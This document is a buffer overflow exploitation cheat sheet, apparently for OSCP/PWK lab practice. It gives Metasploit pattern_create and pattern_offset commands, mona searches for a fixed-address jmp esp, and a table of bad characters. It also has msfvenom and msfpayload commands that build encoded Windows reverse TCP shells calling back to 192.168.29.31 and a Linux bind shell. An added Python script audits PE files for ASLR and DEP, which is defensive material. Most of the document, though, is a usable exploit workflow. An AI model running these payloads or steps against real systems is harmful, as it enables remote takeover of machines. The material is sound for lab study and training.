Buffer Overflow Commands

Create a unique pattern for determining the EIP and ESP offsets (3000 is the length of the unique pattern):

  • /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 > uniq.txt

Determine the offset (34744233 is the pattern value found in EIP at the time of the crash):

  • /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 34744233

Inspect the program's loaded modules for DEP and ASLR in Immunity Debugger:

  • !mona modules
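
The !mona modules listing reports which loaded modules opted in to ASLR and DEP; those are the DYNAMIC_BASE and NX_COMPAT bits of DllCharacteristics in the PE optional header. The following script is an added example, not part of the original cheat sheet, that reads the same bits straight from a PE file so a binary can be audited for these mitigations without a debugger; build_minimal_pe constructs a header-only image for the self-test and is not a real executable.

```python
import struct
import sys

# DllCharacteristics bits from the PE/COFF spec (IMAGE_OPTIONAL_HEADER)
DYNAMIC_BASE = 0x0040     # ASLR: image may be relocated at load time
NX_COMPAT = 0x0100        # DEP: image is compatible with non-executable pages
HIGH_ENTROPY_VA = 0x0020  # 64-bit high-entropy ASLR (PE32+ only)
GUARD_CF = 0x4000         # Control Flow Guard instrumentation present


def dll_characteristics(pe_bytes):
    """Return the DllCharacteristics word from a PE image's optional header."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe_bytes, 0x3C)[0]
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20  # skip "PE\0\0" and the 20-byte COFF file header
    magic = struct.unpack_from("<H", pe_bytes, opt)[0]
    if magic not in (0x10B, 0x20B):  # PE32 or PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics is at offset 70 in both the PE32 and PE32+ layouts
    return struct.unpack_from("<H", pe_bytes, opt + 70)[0]


def mitigations(pe_bytes):
    """Map each mitigation to whether the image opted in to it."""
    flags = dll_characteristics(pe_bytes)
    return {
        "ASLR": bool(flags & DYNAMIC_BASE),
        "DEP": bool(flags & NX_COMPAT),
        "HighEntropyVA": bool(flags & HIGH_ENTROPY_VA),
        "CFG": bool(flags & GUARD_CF),
    }


def build_minimal_pe(flags, pe32plus=False):
    """Constructed header-only image for testing; not a loadable binary."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)  # e_lfanew -> 0x80
    dos += b"\0" * (0x80 - len(dos))
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, 0, 0)
    opt = struct.pack("<H", 0x20B if pe32plus else 0x10B)
    opt += b"\0" * 68 + struct.pack("<H", flags) + b"\0" * 24
    return dos + b"PE\0\0" + coff + opt


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as fh:
        for name, enabled in mitigations(fh.read()).items():
            print("%-14s %s" % (name, "yes" if enabled else "NO"))
```

A module that reports NO for both ASLR and DEP is what mona flags as a candidate for a fixed-address jmp esp, which is exactly why such modules should be rebuilt with /DYNAMICBASE and /NXCOMPAT.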

Find the opcode bytes for an instruction using shellme (GitHub source):

  • python shellme.py -i 'jmp esp'
  • Returns: "\xff\xe4"

Search for jmp esp in dll that was found by mona:

  • !mona find -s "\xff\xe4" -m offsec_pwk_dll.dll

Determine bad chars (the usual suspects):

Hex    Dec   Description
----   ---   ----------------------------------------------
0x00   0     Null byte, terminates a C string
0x0A   10    Line feed, may terminate a command line
0x0D   13    Carriage return, may terminate a command line
0x20   32    Space, may terminate a command-line argument

msfvenom: generate a WINDOWS reverse TCP shell payload (preferred over msfpayload):

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.29.31 LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

msfpayload: WINDOWS reverse TCP shell (legacy syntax, options are given as VAR=VALUE):

  • msfpayload windows/shell_reverse_tcp LHOST=192.168.29.31 LPORT=443 R | msfencode -b '\x00\x0a\x0d' -t c

If it's a threaded application, keep the host process alive on WINDOWS by having the payload exit only its thread (EXITFUNC=thread):

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.29.31 LPORT=443 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai

msfvenom: generate a LINUX bind shell payload:

  • msfvenom -p linux/x86/shell_bind_tcp LPORT=1337 -f c -b "\x00\x0a\x0d\x20" --platform linux -a x86 -e x86/shikata_ga_nai